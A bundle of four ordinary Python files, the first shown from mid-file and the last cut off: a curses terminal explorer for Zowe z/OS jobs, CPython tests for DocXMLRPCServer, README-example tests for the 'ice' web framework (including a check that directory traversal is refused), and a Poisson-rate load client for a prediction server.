'{:03d} {:10}{:10}{:15}{:10}'.format(job["_num"], job["id"],
job["type"], job["name"],
job["status"]))
except:
pass
cur_y += 1
state["window_tree"]["main"].refresh()
state["zowe_state"] = "READY"
def parse_job_list(stdout_text):
lines = stdout_text.split("\n")
jobs = {}
for l in lines:
if len(l.strip()) > 0:
l = ' '.join(l.split())
columns = l.split(" ")
if len(columns) == 5:
job_class = columns[0][0:3].strip().upper()
job_id = columns[0].strip()
job_status = "{} {}".format(columns[1].strip(), columns[2].strip())
job_name = columns[3].strip()
job_type = columns[4].strip()
elif len(columns) == 4:
job_class = columns[0][0:3].strip().upper()
job_id = columns[0].strip()
job_status = columns[1].strip()
job_name = columns[2].strip()
job_type = columns[3].strip()
elif len(columns) == 3:
job_class = columns[0][0:3].strip().upper()
job_id = columns[0].strip()
job_status = "N/A"
job_name = columns[1].strip()
job_type = columns[2].strip()
else:
raise ValueError("unexpected number of columns in zowe jobs output")
if job_class not in jobs:
jobs[job_class] = []
jobs[job_class].append(
{"_num": len(jobs[job_class]) + 1, "class": job_class, "id": job_id, "status": job_status,
"name": job_name, "type": job_type})
return jobs
def define_windows(stdscr):
# height, width, y, x
# top of screen
title = curses.newwin(1, stdscr.getmaxyx()[1] - 25, 0, 0)
timer_window = curses.newwin(1, 25, 0, stdscr.getmaxyx()[1] - 25)
top_menu = curses.newwin(1, stdscr.getmaxyx()[1], 1, 0)
# bottom of screen
edit_window = curses.newwin(1, stdscr.getmaxyx()[1], stdscr.getmaxyx()[0] - 2, 0)
footer_window = curses.newwin(1, stdscr.getmaxyx()[1] - 40, stdscr.getmaxyx()[0] - 1, 0)
footer_window_right = curses.newwin(1, stdscr.getmaxyx()[1], stdscr.getmaxyx()[0] - 1, stdscr.getmaxyx()[1] - 40)
# middle of screen
main_window = curses.newwin(stdscr.getmaxyx()[0] - 5, stdscr.getmaxyx()[1], 2, 0)
return {"root": stdscr,
"timer": timer_window,
"title": title,
"top_menu": top_menu,
"main": main_window,
"editor": edit_window,
"footer": footer_window,
"updated": footer_window_right
}
def resize_windows(stdscr):
stdscr.clear()
return define_windows(stdscr)
def create_windows(stdscr):
return define_windows(stdscr)
def update_menu_time(window_tree):
window_tree["timer"].bkgd(' ', curses.color_pair(2))
time_text = " {}".format(time.strftime("%Y-%m-%d %H:%M:%S"))
try:
window_tree["timer"].addstr(0, 1, time_text, curses.color_pair(2))
except:
pass
window_tree["timer"].refresh()
def update_edit_bar(window_tree):
pass
def action(state, input):
pass
def update_editor(msg):
state["window_tree"]["editor"].clear()
state["window_tree"]["editor"].bkgd(' ', curses.color_pair(2))
try:
state["window_tree"]["editor"].addstr(msg)
except:
pass
state["window_tree"]["editor"].refresh()
def main(stdscr):
"""
This is our main event loop and we only care about redrawing and getting user input
:param stdscr:
:return:
"""
global state
global instr_pipeline
global result_pipeline
state = {"job_type": "JOB", "zowe_state": "STARTING", "shortcut_keys": {}, "action": None}
keys = {}
curses.halfdelay(5)
user_input = ""
alphabet = string.printable
# height, width, x, y
window_tree = resize_windows(stdscr)
state["window_tree"] = window_tree
curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_BLACK, curses.COLOR_YELLOW)
instr_pipeline.put("zowe zos-jobs list jobs")
curses.curs_set(0)
while True:
window_tree["root"].refresh()
window_tree["updated"].bkgd(' ', curses.color_pair(2))
window_tree["updated"].refresh()
window_tree["top_menu"].bkgd(' ', curses.color_pair(2))
window_tree["top_menu"].refresh()
window_tree["editor"].bkgd(' ', curses.color_pair(2))
window_tree["editor"].refresh()
window_tree["updated"].bkgd(' ', curses.color_pair(2))
window_tree["updated"].refresh()
window_tree["footer"].bkgd(' ', curses.color_pair(2))
window_tree["footer"].refresh()
if not result_pipeline.empty():
msg = result_pipeline.get(False)
if msg is not None:
if msg["type"] == "jobs":
state["jobs"] = msg["data"]
update_top_shortcuts_menu(msg["data"])
update_main_window(state["jobs"])
if msg["editor.msg"] is not None:
update_editor(msg["editor.msg"])
elif msg["type"] == "editor":
update_editor(msg["data"])
if msg is not None:
window_tree["updated"].bkgd(' ', curses.color_pair(2))
try:
window_tree["updated"].addstr(0, 1, "{} {:>}".format("Last Updated: ", datetime.fromtimestamp(
msg["timestamp"]).strftime("%Y-%m-%d %H:%M:%S")), curses.color_pair(2))
except:
pass
window_tree["updated"].refresh()
update_menu_time(window_tree)
window_tree["title"].bkgd(' ', curses.color_pair(2))
menu = "{} ".format("Zowe Terminal Explorer")
try:
window_tree["title"].addstr(0, 1, menu, curses.color_pair(2))
except:
pass
window_tree["title"].refresh()
window_tree["main"].bkgd(' ', curses.color_pair(1))
window_tree["main"].refresh()
window_tree["footer"].bkgd(' ', curses.color_pair(2))
try:
window_tree["footer"].addstr(0, 1, "[Q]uit [D]elete", curses.color_pair(2))
except:
pass
window_tree["footer"].refresh()
key = stdscr.getch()
if key == curses.KEY_RESIZE:
window_tree["root"].clear()
window_tree = resize_windows(stdscr)
else:
changed = False
if key != ord('q') and key in range(0x110000):
ch = chr(key)
if ch in state["shortcut_keys"]:
state["job_type"] = state["shortcut_keys"][ch]
update_top_shortcuts_menu(msg["data"])
update_main_window(state["jobs"])
changed = True
if not changed:
if key == 27: # ESCAPE
state["action"] = None
user_input = None
update_editor("")
elif key == ord('q'):
update_editor("Waiting for threads to shutdown...")
threads[0].do_run = False
threads[0].join()
return
elif key in range(0x110000) and chr(key) in "0123456789" and state["action"] is not None:
user_input += chr(key)
update_editor(" Enter job number from first column: {}".format(user_input))
elif key == ord('d') and state["action"] is None:
state["action"] = "d"
update_editor(" Enter job number from first column: ")
elif key == curses.KEY_BACKSPACE and state["action"] is not None:
if len(user_input) > 0:
user_input = user_input[:-1]
elif key == curses.KEY_ENTER or key == 10:
try:
job_num = int(user_input)
if state["action"] == "d":
valid_jobs = state["jobs"][state["job_type"]]
found = False
for j in valid_jobs:
if j["_num"] == job_num:
update_editor("Deleting {} with job id '{}'".format(j["_num"], j["id"]))
instr_pipeline.put("zowe jobs delete job {}".format(j["id"]))
found = True
break
if found == False:
update_editor(" {} is not a valid number.".format(job_num))
state["action"] = None
user_input = None
else:
update_editor(" Not a valid action.")
state["action"] = None
user_input = None
except ValueError as err:
update_editor(" Not a valid job number.")
state["action"] = None
user_input = None
def direct():
"""
Used for testing without curses
:return:
"""
global instr_pipeline
instr_pipeline.put("zowe zos-jobs list jobs")
time.sleep(10)
print(result_pipeline.get())
if __name__ == "__main__":
"""
Main entry point
"""
t = threading.currentThread()
t = threading.Thread(target=execute_zowe_workload)
t.do_run = True
t.start()
threads.append(t)
# direct()
curses.wrapper(main)
|
test_docxmlrpc.py
|
from xmlrpc.server import DocXMLRPCServer
import http.client
import sys
import threading
import unittest
def make_request_and_skipIf(condition, reason):
# If we skip the test, we have to make a request because
# the server created in setUp blocks expecting one to come in.
if not condition:
return lambda func: func
def decorator(func):
def make_request_and_skip(self):
self.client.request("GET", "/")
self.client.getresponse()
raise unittest.SkipTest(reason)
return make_request_and_skip
return decorator
def make_server():
serv = DocXMLRPCServer(("localhost", 0), logRequests=False)
try:
# Add some documentation
serv.set_server_title("DocXMLRPCServer Test Documentation")
serv.set_server_name("DocXMLRPCServer Test Docs")
serv.set_server_documentation(
"This is an XML-RPC server's documentation, but the server "
"can be used by POSTing to /RPC2. Try self.add, too.")
# Create and register classes and functions
class TestClass(object):
def test_method(self, arg):
"""Test method's docs. This method truly does very little."""
self.arg = arg
serv.register_introspection_functions()
serv.register_instance(TestClass())
def add(x, y):
"""Add two instances together. This follows PEP008, but has nothing
to do with RFC1952. Case should matter: pEp008 and rFC1952. Things
that start with http and ftp should be auto-linked, too:
http://google.com.
"""
return x + y
def annotation(x: int):
""" Use function annotations. """
return x
class ClassWithAnnotation:
def method_annotation(self, x: bytes):
return x.decode()
serv.register_function(add)
serv.register_function(lambda x, y: x-y)
serv.register_function(annotation)
serv.register_instance(ClassWithAnnotation())
return serv
except:
serv.server_close()
raise
class DocXMLRPCHTTPGETServer(unittest.TestCase):
def setUp(self):
# Enable server feedback
DocXMLRPCServer._send_traceback_header = True
self.serv = make_server()
self.thread = threading.Thread(target=self.serv.serve_forever)
self.thread.start()
PORT = self.serv.server_address[1]
self.client = http.client.HTTPConnection("localhost:%d" % PORT)
def tearDown(self):
self.client.close()
# Disable server feedback
DocXMLRPCServer._send_traceback_header = False
self.serv.shutdown()
self.thread.join()
self.serv.server_close()
def test_valid_get_response(self):
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader("Content-type"), "text/html")
# Server raises an exception if we don't start to read the data
response.read()
def test_invalid_get_response(self):
self.client.request("GET", "/spam")
response = self.client.getresponse()
self.assertEqual(response.status, 404)
self.assertEqual(response.getheader("Content-type"), "text/plain")
response.read()
def test_lambda(self):
"""Test that lambda functionality stays the same. The output produced
currently is, I suspect invalid because of the unencoded brackets in the
HTML, "<lambda>".
The subtraction lambda method is tested.
"""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertIn((b'<dl><dt><a name="-<lambda>"><strong>'
b'<lambda></strong></a>(x, y)</dt></dl>'),
response.read())
@make_request_and_skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_autolinking(self):
"""Test that the server correctly automatically wraps references to
PEPS and RFCs with links, and that it linkifies text starting with
http or ftp protocol prefixes.
The documentation for the "add" method contains the test material.
"""
self.client.request("GET", "/")
response = self.client.getresponse().read()
self.assertIn(
(b'<dl><dt><a name="-add"><strong>add</strong></a>(x, y)</dt><dd>'
b'<tt>Add two instances together. This '
b'follows <a href="http://www.python.org/dev/peps/pep-0008/">'
b'PEP008</a>, but has nothing<br>\nto do '
b'with <a href="http://www.rfc-editor.org/rfc/rfc1952.txt">'
b'RFC1952</a>. Case should matter: pEp008 '
b'and rFC1952. Things<br>\nthat start '
b'with http and ftp should be '
b'auto-linked, too:<br>\n<a href="http://google.com">'
b'http://google.com</a>.</tt></dd></dl>'), response)
@make_request_and_skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_system_methods(self):
"""Test the presence of three consecutive system.* methods.
This also tests their use of parameter type recognition and the
systems related to that process.
"""
self.client.request("GET", "/")
response = self.client.getresponse().read()
self.assertIn(
(b'<dl><dt><a name="-system.methodHelp"><strong>system.methodHelp'
b'</strong></a>(method_name)</dt><dd><tt><a href="#-system.method'
b'Help">system.methodHelp</a>(\'add\') => "Adds '
b'two integers together"<br>\n <br>\nReturns a'
b' string containing documentation for '
b'the specified method.</tt></dd></dl>\n<dl><dt><a name'
b'="-system.methodSignature"><strong>system.methodSignature</strong>'
b'</a>(method_name)</dt><dd><tt><a href="#-system.methodSignature">'
b'system.methodSignature</a>(\'add\') => [double, '
b'int, int]<br>\n <br>\nReturns a list '
b'describing the signature of the method.'
b' In the<br>\nabove example, the add '
b'method takes two integers as arguments'
b'<br>\nand returns a double result.<br>\n '
b'<br>\nThis server does NOT support system'
b'.methodSignature.</tt></dd></dl>'), response)
def test_autolink_dotted_methods(self):
"""Test that selfdot values are made strong automatically in the
documentation."""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertIn(b"""Try self.<strong>add</strong>, too.""",
response.read())
def test_annotations(self):
""" Test that annotations works as expected """
self.client.request("GET", "/")
response = self.client.getresponse()
docstring = (b'' if sys.flags.optimize >= 2 else
b'<dd><tt>Use function annotations.</tt></dd>')
self.assertIn(
(b'<dl><dt><a name="-annotation"><strong>annotation</strong></a>'
b'(x: int)</dt>' + docstring + b'</dl>\n'
b'<dl><dt><a name="-method_annotation"><strong>'
b'method_annotation</strong></a>(x: bytes)</dt></dl>'),
response.read())
if __name__ == '__main__':
unittest.main()
|
test_examples.py
|
# The MIT License (MIT)
#
# Copyright (c) 2014-2017 Susam Pal
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Tests to verify examples in README.rst."""
import unittest
import urllib.request
import urllib.error
import threading
import time
import ice
from test import data
class ExamplesTest(unittest.TestCase):
def setUp(self):
self.app = ice.cube()
def tearDown(self):
self.app.exit()
def run_app(self):
threading.Thread(target=self.app.run).start()
while not self.app.running():
time.sleep(0.1)
def assert200(self, path, *snippets):
r = urllib.request.urlopen('http://localhost:8080' + path)
response = r.read()
for snippet in snippets:
self.assertIn(snippet.encode(), response)
def assert404(self, path):
with self.assertRaises(urllib.error.HTTPError) as cm:
r = urllib.request.urlopen('http://localhost:8080' + path)
self.assertEqual(cm.exception.code, 404)
self.assertIn(b'<h1>404 Not Found</h1>', cm.exception.read())
def test_getting_started_example(self):
self.run_app()
self.assert200('/', '<h1>It works!</h1>')
self.assert404('/foo')
def test_literal_route_example(self):
app = self.app
# Example
@app.get('/')
def home():
return ('<!DOCTYPE html>'
'<html><head><title>Home</title></head>'
'<body><p>Home</p></body></html>')
@app.get('/foo')
def foo():
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head>'
'<body><p>Foo</p></body></html>')
# Test
self.run_app()
self.assert200('/', '<p>Home</p>')
self.assert200('/foo', '<p>Foo</p>')
self.assert404('/foo/')
self.assert404('/bar')
def test_anonymous_wildcard_example(self):
app = self.app
# Example
@app.get('/<>')
def foo(a):
return ('<!DOCTYPE html>'
'<html><head><title>' + a + '</title></head>'
'<body><p>' + a + '</p></body></html>')
# Test
self.run_app()
self.assert200('/foo', '<p>foo</p>')
self.assert200('/bar', '<p>bar</p>')
self.assert404('/foo/')
self.assert404('/foo/bar')
def test_named_wildcard_example1(self):
app = self.app
# Example
@app.get('/<a>')
def foo(a):
return ('<!DOCTYPE html>'
'<html><head><title>' + a + '</title></head>'
'<body><p>' + a + '</p></body></html>')
# Test
self.run_app()
self.assert200('/foo', '<p>foo</p>')
self.assert200('/bar', '<p>bar</p>')
self.assert404('/foo/')
self.assert404('/foo/bar')
def test_named_wildcard_example2(self):
app = self.app
# Example
@app.get('/foo/<>-<>/<a>-<b>/<>-<c>')
def foo(*args, **kwargs):
return ('<!DOCTYPE html> '
'<html><head><title>Example</title></head><body> '
'<p>args: {}<br>kwargs: {}</p> '
'</body></html>').format(args, kwargs)
# Test
self.run_app()
self.assert200('/foo/hello-world/ice-cube/wsgi-rocks',
"args: ('hello', 'world', 'wsgi')",
"'a': 'ice'", "'b': 'cube'", "'c': 'rocks'")
def test_named_wildcard_example3(self):
app = self.app
# Example
@app.get('/<user>/<category>/<>')
def page(page_id, user, category):
return ('<!DOCTYPE html>'
'<html><head><title>Example</title></head><body> '
'<p>page_id: {}<br>user: {}<br>category: {}</p> '
'</body></html>').format(page_id, user, category)
# Test
self.run_app()
self.assert200('/snowman/articles/python',
'<p>page_id: python<br>user: snowman<br>'
'category: articles</p>')
def test_throwaway_wildcard_example1(self):
app = self.app
# Example
@app.get('/<!>')
def foo(*args, **kwargs):
return ('<!DOCTYPE html>'
'<html><head><title>Example</title></head><body>'
'<p>args: {}<br>kwargs: {}</p>'
'</body></html>').format(args, kwargs)
# Test
self.run_app()
self.assert200('/foo', '<p>args: ()<br>kwargs: {}</p>')
def test_throwaway_wildcard_example2(self):
app = self.app
# Example
@app.get('/<!>/<!>/<>')
def page(page_id):
return ('<!DOCTYPE html>'
'<html><head><title>Example</title></head><body>'
'<p>page_id: ' + page_id + '</p>'
'</body></html>')
# Test
self.run_app()
self.assert200('/snowman/articles/python',
'<p>page_id: python</p>')
def test_wildcard_specification_example(self):
app = self.app
# Example
@app.get('/notes/<:path>/<:int>')
def note(note_path, note_id):
return ('<!DOCTYPE html>'
'<html><head><title>Example</title></head><body>'
'<p>note_path: {}<br>note_id: {}</p>'
'</body></html>').format(note_path, note_id)
# Test
self.run_app()
self.assert200('/notes/tech/python/12',
'<p>note_path: tech/python<br>note_id: 12</p>')
self.assert200('/notes/tech/python/0',
'<p>note_path: tech/python<br>note_id: 0</p>')
self.assert404('/notes/tech/python/+12')
self.assert404('/notes/tech/python/+0')
self.assert404('/notes/tech/python/012')
def test_regex_route_example1(self):
app = self.app
# Example
@app.get('/(.*)')
def foo(a):
return ('<!DOCTYPE html>'
'<html><head><title>' + a + '</title></head>'
'<body><p>' + a + '</p></body></html>')
# Test
self.run_app()
self.assert200('/foo', '<p>foo</p>')
self.assert200('/foo/bar/', '<p>foo/bar/</p>')
def test_regex_route_example2(self):
app = self.app
# Example
@app.get('/(?P<user>[^/]*)/(?P<category>[^/]*)/([^/]*)')
def page(page_id, user, category):
return ('<!DOCTYPE html>'
'<html><head><title>Example</title></head><body>'
'<p>page_id: {}<br>user: {}<br>category: {}</p>'
'</body></html>').format(page_id, user, category)
# Test
self.run_app()
self.assert200('/snowman/articles/python',
'<p>page_id: python<br>user: snowman<br>'
'category: articles</p>')
def test_explicit_literal_route_example(self):
app = self.app
# Example
@app.get('literal:/<foo>')
def foo():
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head>'
'<body><p>Foo</p></body></html>')
# Test
self.run_app()
self.assert200('/<foo>', '<p>Foo</p>')
self.assert404('/foo')
def test_explicit_wildcard_route_example(self):
# Example
app = self.app
@app.get('wildcard:/(foo)/<>')
def foo(a):
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head>'
'<body><p>a: ' + a + '</p></body></html>')
# Test
self.run_app()
self.assert200('/(foo)/bar', '<p>a: bar</p>')
self.assert404('/foo/<>')
def test_explicit_regex_route_example(self):
app = self.app
# Example
@app.get('regex:/foo\d*$')
def foo():
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head>'
'<body><p>Foo</p></body></html>')
# Test
self.run_app()
self.assert200('/foo123', '<p>Foo</p>')
self.assert200('/foo', '<p>Foo</p>')
self.assert404('/foo\d*$')
def test_query_string_example1(self):
app = self.app
# Example
@app.get('/')
def home():
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head>'
'<body><p>name: {}</p></body>'
'</html>').format(app.request.query['name'])
# Test
self.run_app()
self.assert200('/?name=Humpty+Dumpty',
'<p>name: Humpty Dumpty</p>')
def test_query_string_example2(self):
app = self.app
# Example
@app.get('/')
def home():
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head>'
'<body><p>name: {}</p></body>'
'</html>').format(app.request.query.getall('name'))
# Test
self.run_app()
self.assert200('/?name=Humpty&name=Santa',
"<p>name: ['Humpty', 'Santa']</p>")
def test_form_example1(self):
app = self.app
# Example
@app.get('/')
def show_form():
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head>'
'<body><form action="/result" method="post">'
'First name: <input name="firstName"><br>'
'Last name: <input name="lastName"><br>'
'<input type="submit">'
'</form></body></html>')
@app.post('/result')
def show_post():
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head><body>'
'<p>First name: {}<br>Last name: {}</p>'
'</body></html>').format(app.request.form['firstName'],
app.request.form['lastName'])
# Test
self.run_app()
self.assert200('/', 'First name')
form = {'firstName': 'Humpty', 'lastName': 'Dumpty'}
data = urllib.parse.urlencode(form).encode()
response = urllib.request.urlopen(
'http://localhost:8080/result', data)
self.assertIn(b'<p>First name: Humpty<br>Last name: Dumpty</p>',
response.read() )
def test_form_example2(self):
app = self.app
# Example
@app.get('/')
def show_form():
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head>'
'<body><form action="/result" method="post">'
'name1: <input name="name"><br>'
'name2: <input name="name"><br>'
'<input type="submit">'
'</form></body></html>')
@app.post('/result')
def show_post():
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head><body>'
'<p>name (single): {}<br>name (multi): {}</p>'
'</body></html>').format(app.request.form['name'],
app.request.form.getall('name'))
# Test
self.run_app()
self.assert200('/', 'name1')
form = (('name', 'Humpty'), ('name', 'Santa'))
data = urllib.parse.urlencode(form).encode()
response = urllib.request.urlopen(
'http://localhost:8080/result', data)
self.assertIn(b'<p>name (single): Santa<br>'
b"name (multi): ['Humpty', 'Santa']</p>",
response.read() )
def test_cookie_example(self):
app = self.app
@app.get('/')
def show_count():
count = int(app.request.cookies.get('count', 0)) + 1
app.response.set_cookie('count', str(count))
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head><body>'
'<p>Count: {}</p></body></html>'.format(count))
# Test
self.run_app()
response = urllib.request.urlopen('http://localhost:8080/')
self.assertEqual(response.getheader('Set-Cookie'), 'count=1')
self.assertIn(b'<p>Count: 1</p>', response.read())
response = urllib.request.urlopen(
urllib.request.Request('http://localhost:8080/',
headers={'Cookie': 'count=1'}))
self.assertEqual(response.getheader('Set-Cookie'), 'count=2')
self.assertIn(b'<p>Count: 2</p>', response.read())
def test_error_example(self):
app = self.app
# Example
@app.error(404)
def error():
return ('<!DOCTYPE html>'
'<html><head><title>Page not found</title></head>'
'<body><p>Page not found</p></body></html>')
# Test
self.run_app()
with self.assertRaises(urllib.error.HTTPError) as cm:
urllib.request.urlopen('http://localhost:8080/foo')
self.assertEqual(cm.exception.code, 404)
self.assertIn(b'<p>Page not found</p>', cm.exception.read())
# Set status code and return body
def test_status_codes_example1(self):
app = self.app
# Example
@app.get('/foo')
def foo():
app.response.status = 403
return ('<!DOCTYPE html>'
'<html><head><title>Access is forbidden</title></head>'
'<body><p>Access is forbidden</p></body></html>')
# Test
self.run_app()
with self.assertRaises(urllib.error.HTTPError) as cm:
urllib.request.urlopen('http://localhost:8080/foo')
self.assertEqual(cm.exception.code, 403)
self.assertIn(b'<p>Access is forbidden</p>', cm.exception.read())
# Set body and return status code (not recommended)
def test_status_code_example2(self):
app = self.app
# Example
@app.get('/foo')
def foo():
app.response.body = ('<!DOCTYPE html>'
'<html><head><title>Access is forbidden</title></head>'
'<body><p>Access is forbidden</p></body></html>')
return 403
# Test
self.run_app()
with self.assertRaises(urllib.error.HTTPError) as cm:
urllib.request.urlopen('http://localhost:8080/foo')
self.assertEqual(cm.exception.code, 403)
self.assertIn(b'<p>Access is forbidden</p>', cm.exception.read())
# Set status code and error handler (recommended)
def test_status_code_example3(self):
app = self.app
# Example
@app.get('/foo')
def foo():
return 403
@app.error(403)
def error403():
return ('<!DOCTYPE html>'
'<html><head><title>Access is forbidden</title></head>'
'<body><p>Access is forbidden</p></body></html>')
# Test
self.run_app()
with self.assertRaises(urllib.error.HTTPError) as cm:
urllib.request.urlopen('http://localhost:8080/foo')
self.assertEqual(cm.exception.code, 403)
self.assertIn(b'<p>Access is forbidden</p>', cm.exception.read())
# Set return code only (generic error handler is invoked)
def test_status_code_example4(self):
app = self.app
# Example
@app.get('/foo')
def foo():
return 403
# Test
self.run_app()
with self.assertRaises(urllib.error.HTTPError) as cm:
urllib.request.urlopen('http://localhost:8080/foo')
self.assertEqual(cm.exception.code, 403)
self.assertIn(b'<h1>403 Forbidden</h1>\n<p>Request forbidden '
b'-- authorization will not help</p>\n',
cm.exception.read())
def test_redirect_example1(self):
app = self.app
@app.get('/foo')
def foo():
return 303, '/bar'
@app.get('/bar')
def bar():
return ('<!DOCTYPE html>'
'<html><head><title>Bar</title></head>'
'<body><p>Bar</p></body></html>')
self.run_app()
response = urllib.request.urlopen('http://localhost:8080/foo')
self.assertIn(b'<p>Bar</p>', response.read())
def test_redirect_example2(self):
app = self.app
@app.get('/foo')
def foo():
app.response.add_header('Location', '/bar')
return 303
@app.get('/bar')
def bar():
return ('<!DOCTYPE html>'
'<html><head><title>Bar</title></head>'
'<body><p>Bar</p></body></html>')
self.run_app()
response = urllib.request.urlopen('http://localhost:8080/foo')
self.assertIn(b'<p>Bar</p>', response.read())
# Static file with media type guessing
def test_static_file_example1(self):
app = self.app
# Example
@app.get('/code/<:path>')
def send_code(path):
return app.static(data.dirpath, path)
# Test regular request
self.run_app()
response = urllib.request.urlopen('http://localhost:8080/code/foo.txt')
self.assertEqual(response.read(), b'foo\n')
self.assertEqual(response.getheader('Content-Type'),
'text/plain; charset=UTF-8')
# Test directory traversal attack
with self.assertRaises(urllib.error.HTTPError) as cm:
urllib.request.urlopen('http://localhost:8080/code/%2e%2e/foo.txt')
self.assertEqual(cm.exception.code, 403)
# Static file with explicit media type
def test_static_file_example2(self):
app = self.app
# Example
@app.get('/code/<:path>')
def send_code(path):
return app.static(data.dirpath, path,
media_type='text/plain', charset='ISO-8859-1')
# Test regular request
self.run_app()
response = urllib.request.urlopen('http://localhost:8080/code/foo.c')
self.assertEqual(b'#include <stdio.h>\n\n'
b'int main()\n{\n'
b' printf("hello, world\\n");\n'
b' return 0;\n'
b'}\n', response.read())
self.assertEqual(response.getheader('Content-Type'),
'text/plain; charset=ISO-8859-1')
# Test directory traversal attack
with self.assertRaises(urllib.error.HTTPError) as cm:
urllib.request.urlopen('http://localhost:8080/code/%2e%2e/foo.txt')
self.assertEqual(cm.exception.code, 403)
def test_download_example1(self):
app = self.app
# Example
@app.get('/foo')
def foo():
return app.download('hello, world', 'foo.txt')
@app.get('/bar')
def bar():
return app.download('hello, world', 'bar',
media_type='text/plain', charset='ISO-8859-1')
# Test
self.run_app()
response = urllib.request.urlopen('http://localhost:8080/foo')
self.assertEqual(response.getheader('Content-Disposition'),
'attachment; filename="foo.txt"')
self.assertEqual(response.getheader('Content-Type'),
'text/plain; charset=UTF-8')
self.assertEqual(b'hello, world', response.read())
response = urllib.request.urlopen('http://localhost:8080/bar')
self.assertEqual(response.getheader('Content-Disposition'),
'attachment; filename="bar"')
self.assertEqual(response.getheader('Content-Type'),
'text/plain; charset=ISO-8859-1')
self.assertEqual(b'hello, world', response.read())
def test_download_example2(self):
app = self.app
# Example
@app.get('/code/<:path>')
def send_download(path):
return app.download(app.static(data.dirpath, path))
# Test
self.run_app()
response = urllib.request.urlopen('http://localhost:8080/code/foo.txt')
self.assertEqual(response.getheader('Content-Disposition'),
'attachment; filename="foo.txt"')
self.assertEqual(response.getheader('Content-Type'),
'text/plain; charset=UTF-8')
self.assertEqual(b'foo\n', response.read())
def test_download_example3(self):
app = self.app
# Example
@app.get('/<!:path>')
def send_download():
return app.download('hello, world')
# Test
self.run_app()
response = urllib.request.urlopen('http://localhost:8080/foo.txt')
self.assertEqual(response.getheader('Content-Disposition'),
'attachment; filename="foo.txt"')
self.assertEqual(response.getheader('Content-Type'),
'text/plain; charset=UTF-8')
self.assertEqual(b'hello, world', response.read())
with self.assertRaises(urllib.error.HTTPError) as cm:
r = urllib.request.urlopen('http://localhost:8080/foo/')
self.assertEqual(cm.exception.code, 500)
def test_environ(self):
app = self.app
# Example
@app.get('/')
def foo():
user_agent = app.request.environ.get('HTTP_USER_AGENT', None)
return ('<!DOCTYPE html>'
'<html><head><title>User Agent</title></head>'
'<body><p>{}</p></body></html>'.format(user_agent))
# Test
self.run_app()
self.assert200('/', 'Python-urllib')
|
background_client.py
|
import argparse
import base64
import concurrent.futures
import json
from multiprocessing import Process
import numpy as np
import os
import queue
import random
import requests
import socket
import struct
from threading import Thread
import time
from clipper_admin.docker.common import *
img_data = []
ip_addr = None
q = queue.Queue()
stop_feeding = False
def request(idx):
global img_data, ip_addr
start = time.time()
url = "http://{}:1337/bg/predict".format(ip_addr)
print(url)
req_json = json.dumps({
"input": img_data[idx]
})
headers = {'Content-type': 'application/json'}
r = requests.post(url, headers=headers, data=req_json)
end = time.time()
print(end - start)
return (end - start)
# Modified from https://stackoverflow.com/questions/16914665/how-to-use-queue-with-concurrent-future-threadpoolexecutor-in-python-2
def prepare_queries(query_info):
global stop_feeding
while True:
for query in query_info:
time.sleep(query[0])
q.put(query[1])
if stop_feeding:
print("Returning from prepare_queries", flush=True)
return "DONE FEEDING"
return "DONE FEEDING"
def poisson_individual_requests(args, num_imgs):
global img_data
global stop_feeding
total_num_queries = 100000
queries = []
sleep_times = np.random.exponential(1./args.rate, total_num_queries)
#sleep_times = [1. / args.rate] * total_num_queries
send_times = [sleep_times[0]]
for i in range(1, len(sleep_times)):
send_times.append(sleep_times[i] + send_times[i-1])
for i in range(total_num_queries):
queries.append((send_times[i], random.randrange(num_imgs)))
max_num_outstanding = 30#args.rate#10*args.rate #100
with concurrent.futures.ThreadPoolExecutor(max_workers=max_num_outstanding) as executor:
while not stop_feeding:
reqs = []
start = time.time()
for st, idx in queries:
progress = time.time() - start
if progress < st:
time.sleep(st - progress)
reqs.append(executor.submit(request, idx))
if stop_feeding:
break
print("Exiting main loop", flush=True)
end = time.time()
return (end-start)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--frontend_ip", type=str, help="IP address of frontend")
parser.add_argument("--port", type=int, help="Port to listen on")
parser.add_argument("--img_dir", type=str, help="Path to directory containing images")
parser.add_argument("--num_imgs", type=int, help="Number of images that can be queried")
parser.add_argument("--rate", type=int, help="Average # queries to send per second. Used for generating a Poisson process.")
args = parser.parse_args()
print(args)
assert os.path.isdir(args.img_dir)
ip_addr = args.frontend_ip
imgs = [os.path.join(args.img_dir, im) for im in os.listdir(args.img_dir) if "jpg" in im]
num_imgs = min(args.num_imgs, len(imgs))
